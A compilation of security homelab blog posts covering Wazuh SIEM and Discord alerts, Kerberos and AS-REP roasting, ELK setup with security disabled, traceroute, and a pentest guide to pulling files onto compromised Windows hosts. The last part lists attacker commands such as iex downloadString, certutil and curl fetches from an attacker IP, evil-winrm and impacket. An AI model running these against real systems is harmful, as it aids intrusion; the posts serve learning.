curl -sO https://packages.wazuh.com/4.5/wazuh-install.sh && sudo bash ./wazuh-install.sh -a

In the end, there will be a username/password combination for you to copy and paste into your password manager.

You are using a password manager, right?! RIGHT!?

Now the installation is finished and if all went well wazuh is running on your machine.

How do you access it?!

Glad you asked, you can either open the browser on the SIEM machine - or if you want to connect remotely type https://<IP_of_your_wazuh_machine>.

There will be an error telling you that the Server's certificate is not trusted which is expected because it does not come from a certificate authority (CA).

You can safely ignore this error and will be greeted by the login screen of wazuh.

After the login wazuh checks the availability of it's APIs and services and once that is done you can see the wazuh dashboard.

The dashboard looks like this and while yours will not have any agents registered you can do that next.

installing wazuh windows agents

You will now install a wazuh agent on a windows machine first

Start the Windows VM and open the following URL in your browser

https://documentation.wazuh.com/current/installation-guide/wazuh-agent/wazuh-agent-package-windows.html

We will use the Graphical User Interface (GUI) of the wazuh agent to set everything up

You can get the installer here:

https://packages.wazuh.com/4.x/windows/wazuh-agent-4.5.1-1.msi

You need administrative privileges to set everything up - keep that in mind.

Download and double-click that bad boy as if there is no tomorrow.

and then do the following:

You can change the location of the installation via the “advanced” button

but generally, the “Install” button should be your best friend, so click that one

When the installation is finished there is a checkbox that you can try to click on - “Run Agent configuration interface”

For me that sometimes works and sometimes does not, here is a trick that always works:

open C:\Program Files\ossec-agent

and double click on win32ui.exe

That will spawn a management window where you enter the IP of your SIEM server, click on Save and pray that you get an Authentication Key back

IF not…

You need to make sure that the wazuh-server is running

• that the machines are on the same subnet / have a working connection

If all works:

You should see the agent in your wazuh dashboard if all went well 🥳🎊

🥳 1 down, 1 to go for today.

Next up is linux.

install linux agent

Installing the agent on a linux system depends a little on which linux distro you are running.

The process starts like this:

Visit https://documentation.wazuh.com/current/installation-guide/wazuh-agent/wazuh-agent-package-linux.html

and click on the correct linux 🐧 package manager:

Hint:
Amazon Linux / CentOS → Yum
Debian-based (e.g. ubuntu/kali) → APT
Container (Alpine) → APK

I will show the process with a debian box, so I choose apt.

Now we need to follow the steps for APT in my case (ubuntu/debian)

copy the first command and paste it into your terminal inside the linux VM

then the 2nd

and so on

Don’t forget to press Enter in between 🤓

But what do the commands do?!

First you add the public encryption key to your linux key store (keyring)

Then you add 2 new repositories to your linux source list

The 3rd step updates your local package cache so that you can now use

apt to install the wazuh agent.

There is a teeny-tiny BUT though…

In order to properly connect your SIEM and the agent you need to feed a variable called WAZUH_MANAGER with the SIEM IP into the command

EXCUSE ME - WHAT ARE YOU TALKING ABOUT MR MAIKRO?!

There is some black magic going on behind the scenes that automagically connects your wazuh agent with the SIEM server 🪄

BUT only if you provide the IP address of the server:

WAZUH_MANAGER=<IP_HERE> apt-get install wazuh-agent

You can however also register the agent after installing by editing

/var/ossec/etc/ossec.conf

and adding the Manager_IP between the address tags:

<client>
      <server>
        <address>MANAGER_IP</address>
                [...]

Source: https://documentation.wazuh.com/current/user-manual/agent-enrollment/via-agent-configuration/linux-endpoint.html

If all went well you can now add the agent service to the auto start services by running three commands:

systemctl daemon-reload

systemctl enable wazuh-agent

systemctl start wazuh-agent

Once that is done you should see the agent appear in your wazuh dashboard

🔥 CONGRATULATIONS 💙

You installed two wazuh agents plus a SIEM in your HomeLab 🎉

Introduction

Kerberos is an authentication protocol that superseded NTLM with the release of Windows 2000 (technically…)

Technically?!

Well… It's complicated 😅

Long story short - NTLM is still alive and kicking and… it might still be the fall-back solution in case Kerberos does not work. 😵

With that in mind let's talk about the moving parts in Kerberos and look at some wireshark pcaps.

This is Kerberos Authentication in a nutshell 🥜

AS-REQ → AS-REP
TGS-REQ → TGS-REP

Done.

well…

That's not really explaining it though, is it?!

Ok ok, you are right. Let's try to figure out what those words??? letters! mean..

Kerberos Tickets 101

Kerberos comes from the Greek Cerberus - the three-headed guard dog of the underworld.

We don’t judge and love all puppies 🐶

This particular one has an affinity for tickets.

F*CK balls and toys, it only likes tickets.

When thinking about tickets, the first thing that comes to our heads is:

theme park!!! 🎉

In order to go into a theme park you need a ticket - the ACCESS ticket

But sometimes, you also need separate tickets to take rides inside the theme park - the ride tickets.

Usually, there is a booth at the entrance of the park where you pay 💰 and show your ID to prove you are of legal age to enter alone 🐣.

This booth is called the KDC.

KDC - Key Distribution Center

This is the magical 🪄 place that hands out tickets.

The ticket booth consists of two small tents - one checks IDs + gives access tickets (left - AS)

+ The other checks take access tickets + hand out ride tickets (right - TGS).

In the middle is the entrance to the theme park.

AND in front of it all, sits our little puppy wagging its tail.

Wait but why do we need a ticket from the booth if Kerberos had one under its paw?!

Can’t we just steal it?!
And why does it have a different color (golden)?!

Well… I don't know if you are a dog whisperer but for me, this is a big NO NO

I would much rather trade something to get the ticket from mr puppy without hurting myself.

But what does Kerberos like?!

TICKETS!!!

It’s like the cookie monster but instead of cookies 🍪 Kerberos has an unhealthy obsession with tickets 🎫

No steaks, no squeakers, just tickets.

...to get the ticket we need another ticket…

Pheww…

Ticket Granting Tickets

Concerning the colors - We have seen a few different tickets already:

Ticket Granting Ticket (TGT) - access ticket (red)
Ticket Granting Service Ticket - single ride ticket (silver)
Golden Ticket - VIP pass for all rides (golden)

Now how do we combine all of this into the beautiful mess that we saw earlier?
Remember our Wireshark flow?

AS-REQ → AS-REP
TGS-REQ → TGS-REP

ok slowly:

AS - Authentication Service - This was the left tent in the KDC picture
REQ - Request
REP - Response

OHHHHH, that makes sense 🤯
But WAIT what about the KRB Error?!

YES, good catch 🫴🏉

Look at the Length of the AS-REQ(uest) - it is 300 Bytes and we receive a KRB5KD_ERR_PREAUTH_REQUIRED

This means that the account that we try to authenticate with does not have the “Does not require preauthentication” flag set.

ok sure… WHAT?!!?

There is a (non-default) setting called “Does not require preauthentication” and if that one is set, this account does NOT require preauthentication.

In essence, this means you can request an access ticket (TGT),

WITHOUT the credentials of the user you are requesting it for.

EXCUSE ME?!

AS-REP Roasting 101

Yeah… there is a technique called AS-REP (GET IT?!?!?!) roasting, which requests an access ticket for users without Kerberos preauth.

Back to the Ticket - Why do we want to request a ticket that we know will not be correctly working?

Part of the response is encrypted with the password of the user…

OH DANG…

Yes… They can then be used for offline cracking/brute force guessing of the user password. 😈😅

Hacker use a tool called impacket-getNPUsers.py to get a crackable hash like the one below

Long story short - there is a reason why this “option” is not default!

Be careful BEFORE turning this on.

Back to the Error - We send the ID (credentials) of a user to get a personalized access ticket

→ There is a difference of 80 bytes (300 → 380) between the 1st & the 2nd AS-REQ

If all goes well, the KDC responds w/ an AS-REP (Authentication Service Response) with our access ticket 🎟️

Can we see that?!

Sure.

Ticket Granting Service Tickets

Looking at the AS-REP in Wireshark shows us that there is a section called “Kerberos”

This one holds the AS-REP section → a part called ticket

Another one called cname - the account (CNameString) that requested the ticket (maikroservice), and crealm aka domain (snackempire.home)

The ticket is encrypted and we can see it at the bottom highlighted in blue 💙🙆‍♂️

Wonderful, now we have a Ticket Granting Ticket or as I like to call it “access ticket” 🎟️

For all the defenders and curious people out there:

The request for an access ticket generates an event with ID 4768 on the domain controller.

Our access ticket gives us access 🤓 to the 2nd tent - the Ticket Granting Service (TGS) 🏕️🔑🎪 → ⛺️🎫

We now present said access ticket to the clerk in the 2nd ticket tent and they will ask one question:

Which ride do you want a ticket for?!

Ooofff….

Which rides are there?!

Great question!
I have prepared an overview.

These are often called silver- or service tickets but we can think of them as “rollercoaster tickets” or whichever ride you prefer.

Concerning some of the possible services we can ask them for - 👀 ⬇️

Ticket Granting Service Tickets Types (Silver Tickets)

HOST - winrm/PowerShell remoting → remote access

CIFS - file server/psexec → remote access if the share is writeable

HTTP - winrm/PowerShell remoting → remote access

LDAP - remote server administration → remote control

KRBTGT - GOLDEN TICKET 🎫 → VIP ALL ACCESS PASS 😎🎉

Ooofff... That's a lot.

Ok, slowly!

Ok but what's the process like?!

In Wireshark - in the AS-REP our access ticket is 2da8de0621…

When we now request a ride ticket we send our access ticket in the TGS-REQuest (see below), this is important because it VERIFIES that we are a real user in the domain.

You can see that in our TGS-REQ we send our ticket (cipher) 2da8de0621… which allows the Key Distribution Center to verify that we are who we say we are.

Conceptually, we send our access ticket (TGT) with the name of the requested ride (service) and receive a personalized service/silver/ride ticket back.

This triggers a Windows Security Event #4769 which might be helpful when hunting for hackers 😉

With the ride ticket in hand, we can now access the theme park and specific rides 🎢 or request a new ride ticket with our access ticket 🎟️

In one of the next posts we walk through RDP and what happens on a packet level.

Stay tuned.

The one that I missed was Discord - so I decided to build it. Now you can forward your all or specific alerts to a discord channel of your choice.

Here is the link to the code required: https://github.com/maikroservice/wazuh-discord-integration/

In order to get this running you need to do the following steps:

Create Discord Server

First up create a discord server if you do not have one yet. In order to do that open Discord and click the big plus button:

Then choose the Create My Own option and in the next screen select the option that meets your needs - I will choose the For me and my friends option, because this server is for internal use only.

The only thing left to do is to give the server a name.

Add a private text channel

You need to either create or choose an existing channel where the alerts should be posted. I created a channel called wazuh-alerts to be explicit about the channel's purpose. Here is how you do that:

First up, click the small + button next to the TEXT CHANNELS - choose a Text channel and make sure to select the Private Channel option at the bottom. You could also directly allow access for specific roles/groups should you wish to do so, or you can skip the selection for now.

If all goes well you will now see a NEW channel with the correct name on your server.

Create a Webhook integration

You need a webhook to send messages to your server - this is basically a bot member of your server that has the right to post messages in specific channels.

Right-click on your server - choose Server Settings -> Integrations .

Then you will see the following screen and need to press the New Webhook button.

Give that integration a name and select the channel to receive the alerts. You could also add a picture if you want to but it is not necessary for the next steps to work.

The important part is the Webhook URL, this is the url that wazuh connects to and sends the alerts. They will then be converted into messages and posted in the discord channel.

Copy the Webhook URL and save it for the next step.

Register the integration in wazuh

1. You need to register the integration in wazuh - for that to happen start wazuh, connect to the dashboard and visit the configuration area in the Server management section.

Next in the top right click on Edit configuration

Now you are editing the ossec.conf located here /var/ossec/etc/ossec.conf

Directly under the </global> tag you can paste the following code:

 <integration>
     <name>custom-discord</name>
     <hook_url>https://discord.com/api/webhooks/XXXXXXXXXXX</hook_url>
     <alert_format>json</alert_format>
 </integration>

The name needs to start with custom- - which took me the better part of an hour to debug... 😅

Now you do not have to make the same mistake.

When done correctly it should look like this:

Add your discord webhook url

The last step in the configuration section is to add the correct webhook url between <hook_url> and </hook_url>. Once that is done you need to click the Save button and then click on the Restart Manager button afterwards, You should see a popup asking you to confirm the operation - click on Confirm.

Once that is done - your wazuh instance will tell you that the manager is restarting and once the Restarting Manager button turns blue again you are good to continue to the terminal for the final two steps.

Set up wazuh integration

Wazuh's integrations are located in /var/ossec/integrations - You will see 7 files there already.

Most integrations consist of two files - one Python file (e.g. slack.py) and one bash script (slack).

You need to add two files now: custom-discord and custom-discord.py - copy and paste the files from GitHub (https://github.com/maikroservice/wazuh-discord-integration/) into this folder. Next, use the following commands to change the permissions and adjust the ownership of the two files.

sudo chmod 750 /var/ossec/integrations/custom-*
sudo chown root:wazuh /var/ossec/integrations/custom-*

The folder should now look like this:

Once that is done make sure that pip is setup correctly and has the requests library installed.

# debian / ubuntu
sudo apt-get install python3-pip
pip3 install requests

# amazon linux / centos
sudo yum install python3-pip
pip3 install requests

Restart the wazuh manager and you should see alerts showing up in the discord channel.

/var/ossec/bin/wazuh-control restart

You can trigger it by typing the wrong password for a user on a machine running the wazuh agent. If all goes well you should see something like the screenshot below.

If you do not see the alerts in Discord you can first look at the logs of integratord. If you see an error such as the one below you might want to increase the verbosity of the integratord log.

How you ask?! - Use the following command:

/var/ossec/bin/wazuh-integratord  -dd

That should give you a detailed description of what's going wrong and can fix it.

Sources

https://documentation.wazuh.com/current/user-manual/manager/manual-integration.html#manual-integration

First, make sure that you have created and selected the appropriate storage disk - this can be done by opening the proxmox management interface in your browser, selecting Datacenter and proxmox

and then Disks and Directory. If you have only 1 drive (not recommended though) you will have a local disk directory already setup, as indicated by the four disks stacked on top of each other in the UI. This can be found under Datacenter > proxmox > local .

I will demonstrate the steps necessary to upload an iso disk image using proxmox 7.3.3, but later versions should have a similar setup.

The next step is to click on the respective disk that you want to select and upload the iso/img file to - in my case local.

Once that is done a new vertical navigation bar will appear, like the one below:

In this bar you need to select ISO Images which will contain our disk images. These can be uploaded from your computer via the Upload button or with Download from URL button.

Please note that there is a size limit for proxmox upload functionality - it is around ~2 GB depending on your specific instance. If you hit that limit your proxmox will show you a popup with the error code 0:

"Error code: 0" or "Upload failed with code 0"

In this post I will guide you through the installation of Elasticsearch, Kibana and Winlogbeat. We will walk through each step on Amazon Linux 2 (but the concept is similar for other Linux distributions).

In part 2 we will see how we can use the System as a Security Information and Event Management System (SIEM). A SIEM collects logs from the machines in the network. It also provides a queryable interface that the Blue Team uses to detect cyber attacks.

The easy way

The easiest option to see it in action is to clone the template I created on snaplabs (https://www.snaplabs.io). For that you create an account on snaplabs, login and you are then greeted with the following page.

Snaplabs works with Amazon Web Services (AWS). To use it you need to connect your AWS account by clicking the big button in the middle of the page. One cool thing about snaplabs! The machines will be shutdown after 2h automatically. No more expensive surprise cloud bills! Plus, you can change the time limit as well.

Once you have connected your AWS account you can clone the template by visiting the following url: https://dashboard.snaplabs.io/launch/0e5b712f-4acc-432f-5204-3ff9711ca029

DISCLAIMER

Make sure to not use this in any production environment. This is HomeLab stuff only, because you don't have any authentication and no encrypted traffic - SERIOUSLY BAD JUJU. OK, on we go!

Step 0

Start the machine/cloud instance that you want to run Elasticsearch on. We will use AWS EC2 and 8GB RAM and 40GB of disk space. Why!? Because we want to run Elasticsearch and Kibana on the same machine. You would not do this in production environments! You would split the Services onto their separate instances for scalability and redundance.

Step 1

Connect to the machine via ssh or guacamole.

next we install java

Since the Elastic stack runs on java we need a JDK and openjdk is our choice here.

sudo yum -y install java-openjdk java-openjdk-devel

Step 3

Now we need to add the corresponding repositories with:

cat <<EOF | sudo tee /etc/yum.repos.d/elasticsearch.repo
[elasticsearch-8.x]
name=Elasticsearch repository for 8.x packages
baseurl=https://artifacts.elastic.co/packages/8.x/yum
gpgcheck=1
gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
enabled=1
autorefresh=1
type=rpm-md
EOF

Press enter once more and you should have created the correct file.

Step 4 - import the gpg encryption key

sudo rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch

Step 5 - clean and update the system cache

Now we clean the system cache and update it afterwards. This makes sure that our system knows where to get the Elastic Stack components from. It also ensures that our machine can reach the repository sites necessary for step 6.

sudo yum clean all

followed by

sudo yum makecache

Step 6 - install Elasticsearch

Did someone say please start already? - ok here we go - install Elasticsearch.

sudo yum -y install elasticsearch

Step 7 - wait. wait. wait until its installed. ok?

Once Elasticearch was downloaded and installed you should see output similar to the screenshot below - make sure to copy the elastic password and save it somewhere secure (you can reset the password later as well - and actually... since you want to install everything without security... why would you need a password?! spoiler - you don't.)

Step 8 - making sure it works

Make sure that everything worked out by running

rpm -qi elasticsearch

which should give a similar output to this one

Half-way time

Wonderful, everything worked out exactly as we planned. If only this thing were running already, we could search for everything! (almost).

Conceptually, we now need to enable the Elasticsearch service and configure it to not use the security features that come per default since version 8.

disable the security features & change the configuration

Since you are still reading I assume you either know what you are doing, just want it to work because everything else failed, or you are a rebel. I like rebels.

You can use any editor and change the /etc/elasticsearch/elasticsearch.yml.

sudo nano /etc/elasticsearch/elasticsearch.yml

change the lines network.host, http.port and discovery.seed_hosts to the following:

network.host: 0.0.0.0

http.port: 9200

discovery.seed_hosts: []

You might need to remove the pound-signs/hashtags at the beginning of each line.

If you want to understand what exactly we are doing: We set the network host to allow access from any IP (0.0.0.0), set the Elasticsearch port to 9200 and clear the hosts (because currently there are none and there will be only one in this setup)

Last but not least look for the following line:

xpack.security.enabled: true

and make that

xpack.security.enabled: false

This disables the default security features (e.g. https and password/token-based authentication) and lets us use http (unencrypted) communication because we are lazy and don't like certificates.

enable and restart the Elasticsearch service

sudo systemctl enable --now elasticsearch.service

sudo systemctl restart elasticsearch.service

ITS ALIVE

If everything worked you should be able to test that everything is well via:

curl http://127.0.0.1:9200

and be greeted with similar output

if for some reason this gives you an error / empty response make sure that elastic is running

systemctl status elasticsearch.service

In an ideal world it would look like this:

If the output is "inactive" try restarting the service manually and curl again

sudo systemctl stop elasticsearch.service

followed by

sudo systemctl start elasticsearch.service

Should all of this not lead to the expected result you can try to check the logs to see if you can pinpoint errors.

journalctl -xe

Kibana

Since Kibana is part of the elastic repositories we added earlier we can directly install it.

sudo yum -y install kibana

enabling the service

As with Elasticsearch we also need to enable the Kibana service so that it runs after reboot.

sudo systemctl enable --now kibana

configuring Kibana

Kibana needs to know which port it should run on (default is 5601), which Elasticsearch server it should connect to (we... well we have only 1 machine for everything currently, so probably that one as well). Remove the pound-sign/hashtag and change the following lines in the /etc/kibana/kibana.yml:

server.port: 5601

server.host: "0.0.0.0"

server.publicBaseUrl: "http://<your_server_ip_goes_here>:5601"

elasticsearch.hosts: ["http://127.0.0.1:9200"]

The first line tells Kibana to use its default port 5601. The next one defines who can access the Kibana instance (0.0.0.0 is everyone or the whole internet). The Server public base url is the address that you want to reach the Kibana server at. It is usually the IP of your Kibana server plus the port at the end. The last line tells Kibana where to look for the Elasticsearch server. In our case this would be the loopback address of our localhost.

(re)starting Kibana and testing everything

Once all of the steps above have been done you can restart Kibana, check if it is active and start collecting logs. We can achieve that with commands we already know:

sudo systemctl restart kibana 

systemctl status kibana

If Kibana is active we should be able to open a web browser now... but where?!

We need one more instance that actually we can collect logs from. We also might be interested to see the dashboard so let us catch two fish with one net.

We add a Windows Server 2019 or 2022 machine to our Snaplabs Network with 4GB RAM and 40GB disk space. Make sure that this one is in the same subnet.

Now you can open a browser and type:

http://<your-kibana-server-ip-here>:5601

and you should be greeted with the Kibana dashboard that looks like this:

Winlogbeat

Winlogbeat will connect our windows machine to the Elasticsearch + Kibana server. It lets us see pretty graphs in Kibana as well, so lets install it already.

go check out: https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html

for a detailed walkthrough or follow me for the visual version.

First you download winlogbeat on your windows machine (https://www.elastic.co/downloads/beats/winlogbeat)

Next you unzip it. After that you move the (inner) folder to C:\Program Files\winlogbeat. Now edit the winlogbeat.yml:

setup.kibana:
  host: "<your-kibana-server-ip-goes-here>:5601"

output.elasticsearch:
  hosts: ["<your-elastic-server-ip-goes-here>:9200"]

Save the file. Finally, do the following:

• open Powershell as an administrator (either login as Admin or right-click the powershell icon and click "Run as Administrator"

• navigate to the winlogbeat folder

  cd 'C:\Program Files\winlogbeat'
  

and run:

. .\install-service-winlogbeat.ps1

This will throw a Security warning at you which you can read!!! and then decide to click the "R" button followed by enter, which will run the script once. After that you will see that the status of your newly installed winlogbeat service is "Stopped".

HUH?! WHY YOU NO START Mr. Service?!

I shall help you with that.

We setup winlogbeat with:

.\winlogbeat.exe setup -e

and then start the service with

Start-Service winlogbeat

now you can check if the service is running by using

services.msc

scrolling down the list to "w" and finding your service as "running".

You can always start the service from the service menu by right-clicking winlogbeat and then selecting "Start" or "Restart" if it is not working.

Winlogbeat Dashboards

Open a Browser on the Windows Cloud machine and navigate to Kibana (your elastic ip + port 5601). Next click on the menu at the top left and select Dashboard.

You should see [Winlogbeat Security] Dashboards at the top now if everything worked.

Select the "[Winlogbeat] Overview" dashboard and stare in awe for a couple of minutes. You have real live events coming in here - WAOW! If you for example add a new user on the windows machine

net user maikroservice Th15isMyP4$$w0rd! /add

and then make that user a local administrator

net localgroup administrators maikroservice /add

You should see a couple of events shortly after in your Kibana.

First will be a 4720 - user created.

And next will be a 4732 - User added to Privileged Group

You can filter the time shown at the top right.

If you want to learn more about Windows Event IDs check out: https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/

or follow me on twitter (https://twitter.com/maikroservice) for Threads about Security Topics.

I hope you learned something today - this was an awesome experience for me.

Next up - Securing your CloudLab Monitoring

I recommend you check out https://maikroservice.com next week, because we will update the security of our elastic installation. First with username/password based authentication.

• Ultimately, with token based authentication!

Stay tuned and keep learning.

traceroute to the rescue!

Summary

traceroute and its windows equivalent tracert work with the ICMP (Windows) or UDP protocol (Linux & Mac). It is generally used to follow the way packets travel through a network.

The software sends out packets with a Time To Live (TTL) of 1 first and awaits the Type 11 - TTL exceeded response, then sends out packets with a TTL of 2 and does the same again. This loop continues until either the destination is found, or the max TTL was reached (differs from implementations, common TTLs are 128 for Windows and 64 for Mac/Linux).

Traceroute then displays the time it took for the packets to go out and “come back” - the round-trip time.

When prepping for an interview this answer might suffice, you can stop reading now.

If you are still interested in more depth knowledge - strap in, its gonna be a wild ride.

FYI: We will use traceroute as the synonym for both traceroute and tracert for the rest of this post.

So how exactly does it work?

Traceroute identifies hops across routers, each hop resembles a time to live (TTL) decrement of -1, which you might have come across when checking the TTL on ping requests and abstracting which operating system is running. Additionally, you usually can see how many routers are in between you and the target during CTFs, because there is a high chance there is only 1 🤓.

Quick divergence to what TTL actually is - a TTL is the amount of hops (routers), that a packet can pass before it is timed out / discarded by said router.

What does that mean?

imagine you have a Windows machine and a typical TTL for packets is 128, so that means that this packet we just send can travel by 127 routers before the final router discards the packet.

Actually, discarding the package is not completely correct - what happens is that the final router sends an ICMP (TTL Exceeded) back to the origin, we can simulate this with a specific flag (-m for mac, -t for linux) - this seems to be independent of the original request - even when we send a UDP request, we get a TTL exceeded back via ICMP.

Diving deep into packets and protocols with a fake shark fin on our head 🦈

Lets prototype something - first we use traceroute of the classical IP used for testing if the internet is on 🔥 - 8.8.8.8 (google).

We deliberately set the TTL to 1 to make sure that we don’t get far, not even out to the internet, this packet is under home arrest and gets stopped at my local router (192.168.0.1).

We can ask our friend wireshark to show us exactly the requests that were send and received, so lets check what the router returned.

Request from my machine to 8.8.8.8

There is a lot to unpack here.

First we see that my local IP is 192.168.0.44, the destination is 8.8.8.8 as we specified. We can also see that we used the UDP protocol to the remote port 33435 and locally we listen on 41101. Additionally, 24 bytes of 0’s are send and I am still trying to figure out why.

Response from my router to my machine

Once my router has received the packet, reduced the TTL by 1 and it made the unfortunate realisation that this packet needs to stop and return to sender pronto because the TTL is 0 now. Therefore, it mirrors the original request and adds ICMP headers of TTL exceeded.

One potentially important note is that traceroute likes to measure response times and tells us how much time passed between sending the request.

When we inspect the previous command again we can see that we have 3 response times - why though?

This is because for each TTL-change 3 packets get send by traceroute and the durations we see here are the round-trip-times for the individual packets.

What does an asterisk mean in the results?

Good. You tried it yourself and at some point saw the death star in your terminal. The asterisk means that the router did not respond within the timeout limit, sad but okay.

Your therapist says - Have you thought about AMSI, maybe that one is the problem?

If you don't exactly know what these words mean but want to understand it better and are trying to jump into a career as a penetration tester or red-teamer, you came to the right place. Let's learn together how we can first of all download binaries, executables, powershell scripts, and whatever else your heart desires. Disclaimer: You should not use your knowledge for anything illegal. Never. Safe the internet and protect its citizens.

For this blog post we will go through 10+ ways of downloading files, on windows with a command line interface.

10+ ways of downloading files via the command line on windows

1. Meterpreter shell

The infamous Metasploit framework is a common way to pop a shell on a compromised machine. It is beginner-friendly, frequently updated, and spans exploits from years in the past to recently released CVE's. You have session handling, multiple delivery paths, automatic AMSI-bypass (web-delivery), local exploit suggestion, and many, many more.

This conglomerate of functionality and features ensures its pole position. And it also has upload skills - all you have to do is type:

meterpreter > upload </home/kali/file_to_be_uploaded.exe>

Let the magic happen and your file appears on the box in your current working folder. As easy as that.

A trip to - Living off the Land

Sometimes we don't want external scripts or libraries to perform functions that the operating system is capable of as well. If we utilize system binaries / functionality to perform "hacking" tasks, e.g. downloading/uploading or privilege escalation it is called - living off the land attacks. Let's see what Windows has in store for us natively.

2. certutil

Certutil is a command-line program that Microsoft usually uses for certificate services - Microsoft Documentation. It is present in cmd.exe environments where PowerShell might not be available for your user or other restrictions apply.

We use the -urlcache option together with the -f flag - the former tells certutil to retrieve a "cached" certificate and the latter forces certutil to fetch the remote resource, which should be a certificate in theory (but it does not have to be ;) ).

Another neat trick is that you can rename your files and thus make them less conspicuous, just add a new filename at the end of the download command and your file now has a shiny new name on the windows machine.

certutil -urlcache -f http://<attackerIP>:<port>/file_to_be_uploaded.exe <new_filename.exe>

PowerShell and cmdlets

Now we dive into the world of PowerShell, the only scripting language you will ever need in windows land (according to Microsoft?). I am still amazed about its design and ideas, so much that I constantly need a cheat sheet around in order to remember the basic syntax. One nice thing though - it is case-insensitive, no more capitalization typos for me, thank you. Chapeau to whoever designed it, I will never be as smart as you and fortunately, I am content with that.

Powershell uses lightweight commands - so-called cmdlets, which to me is similar to Unix one-liner aliases defined in your .bashrc combined with Python's object-oriented - everything is an object - style.

Technically, a cmdlet is a Microsoft .Net Class instance and it returns a Microsoft .Net object. They use a verb-noun syntax.

To simplify things: With our programming knowledge we can deduct that this resulting object potentially has its own functionalities/methods/attributes which we could explore and the object can be used for further processing within other cmdlets or scripts. You are also able to define your own cmdlets which is out of scope for this blog post, but the interested reader could check out: cmdlet documentation & How to write a simple cmdlet

3. invoke-expression

Back to the interesting bits and pieces, we can use Invoke-Expression to execute code on the local machine. One interesting way is to tell the machine to go and fetch some remote resource for us, sometimes also called downloading files ;).

The important part about about Invoke-Expression is that it does not touch the hard disk, everything is kept in memory, so it by design "evades" Windows Defender (but not AMSI and real-time protection among others, unfortunately).

The Microsoft documentation warns users that the use of invoke-expression in scripts is discouraged, unless you use predefined inputs and don't let the user directly run their own "expressions".

Typically, we use the Net.Webclient class together with the corresponding downloadStringmethod, which naively downloads anything we point it to, without checking the contents of the remote resource (thank you for that).

In this case the remote file name will be the same after the download.

Invoke-Expression can be abbreviated with iex in PowerShell which makes it a lot less typo-error prone.

PS C:\> iex (New-Object Net.WebClient).downloadString("http://<attackerIP>:<port>/file_to_be_uploaded.exe")

# or 

PS C:\> echo -n 'iex (New-Object Net.WebClient).downloadString("http://<attackerIP>:<port>/file_to_be_uploaded.exe")'

4. Invoke-WebRequest

Another option is to use the Invoke-WebRequest cmdlet, should Powershell Version 3 and newer be available. Under the hood, it uses Internet Explorer Engine to parse the request/response and it will throw an error if the said engine is not installed. An easy way to fix it - use the -UseBasicParsing flag for all your requests, which in Powershell 6 became the new default anyhow. This cmdlet has another potentially dangerous side-effect when used together with Responder.py + -UseDefaultCredentials. An attacker could then for example exfiltrate the password hash for the current user and relay it to perform pass-the-hash-attacks.

Invoke-WebRequest can be abbreviated with iwr - wohooo.

PS C:\> iwr -UseBasicParsing -Uri "http://<attackerIP>:<port>/file_to_be_uploaded.exe" -Outfile <new_filename.exe>

5. powershell + wget

What would a child between Windows and Linux look like you ask? I don't know, but Microsoft enabled wgetas a wrapper around Invoke-WebRequest, which means if the system has Powershell 3+ you should be able to use wget in windows.

PS C:\> wget -UseBasicParsing http://<attackerIP>:<port>/file_to_be_uploaded.exe -O <new_filename.exe>

6. powershell + curl

The linux-love story is not over yet, recently Microsoft shipped native binaries for tar and curl, which means the real deal curl executable should now be available on Windows in both cmd and Powershell. Additionally, after PowerShell version 3, there was also an alias around Invoke-WebRequest which enabled similar syntax.

# powershell v3+
PS C:\> curl -UseBasicParsing http://<attackerIP>:<port>/file_to_be_uploaded.exe -O <new_filename.exe>

# Windows 10, version 1803+
C:\> curl http://<attackerIP>:<port>/file_to_be_uploaded.exe -o <new_filename.exe>

7. evil-winrm

When the nmap/rustscan output shows port 5985 open you have potentially hit the jackpot and are able to use evil-winrm to pop a remote shell. WinRM is a remote management toolkit that is exploitable and only needs two things:

1. credentials for the host, 2. to be activated, but if you see port 5985 open there is a high likelihood that this is the case. For your convenience evil-winrm also has an upload functionality which is unfortunately not visible in the help but if you type menu. You need credentials for winrm and you can also enable it once you are on the box and have a privileged user - via winrm quickconfig.

*Evil-WinRM* PS C:\Users\maikroservice\> upload /home/kali/file_to_be_uploaded.exe

8. sftp

Since Windows 10 you have ssh support and that also means you have file transfer protocol via ssh aka sftp. You need remote credentials for this one but you can always use your local kali instance credentials to connect to. The usage is very similar to ftp - you are able to use basic commands, such as pwd, dir, and put/get to receive/send files. One very neat feature of sftp over ftp is the encryption via ssh, this should not be underrated in real-life engagements.

PS C:\> sftp <user>@<AttackerIP> -P <ssh_remote_port>
sftp> put /home/kali/<file_to_be_uploaded.exe>
Fetching /home/kali/file_to_be_uploaded.exe to file_to_be_uploaded.exe
/home/kali/file_to_be_uploaded.exe    100% 130 8.6KB/s 00:00

9. scp

Along the same line, we can also use secure copy or scp to transfer files via ssh. For this, we again need credentials for a remote host (usually your kali machine) and a file that we want to be uploaded. This is also encrypted via ssh so more secure than some of the http-based transfers we explored earlier. It should come with newer windows versions and most linux distros.

scp <username>@<AttackerIP>:/home/kali/file_to_be_uploaded.exe <file_location_on_windows, e.g. c:\users\maikroservice\desktop\file_to_be_uploaded.exe>

impacket

For the last five ways to get your files onto a Windows-box we will look at the impacket toolkit.

For all of the following methods you will need credentials and some of them only work if their counterparts are enabled on the Windows machine itself.

Technically, they are living off the land attacks as well, but since you need to remotely initiate the shell and they are all packaged under the impacket umbrella I wanted to give them their own category.

Note: One of the hardest tasks an aspiring cybersecurity aficionado has to take care of is installing impacket and making sure to have the most up-to-date version of it. Some say it is harder than escaping vim, others are still stuck trying to find which folder contains the correct python files on their kali linux.

I have come to help and share how I use them easily:

usually impacket might be already installed on your kali and the individual scripts can be used via impacket-<script_name> in your kali terminal

10. impacket-wmiexec

WMI, or Windows Management Instrumentation is an admin feature for remote management of machines. The power of wmiexec lies in the details, if it is available we don't get a pseudo-shell but we are able to start processes instead (minor detail, but huge for evading detection / leaving a clean environment). This means we don't need to transfer an arbitrary executable to do something but we use native Windows Remote Management tools to do our bidding.

More details as to how to use WMI for event-based notifications (e.g. a user logs in and you can now dump their credentials using mimikatz or similar) can be found in this blog post.

You can use lput to upload files to the Windows machine like so:

impacket-wmiexec <username>:<password>@<windows_machine_ip>
Impacket v0.9.24.dev1+20210815.200803.5fd22878 - Copyright 2021 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
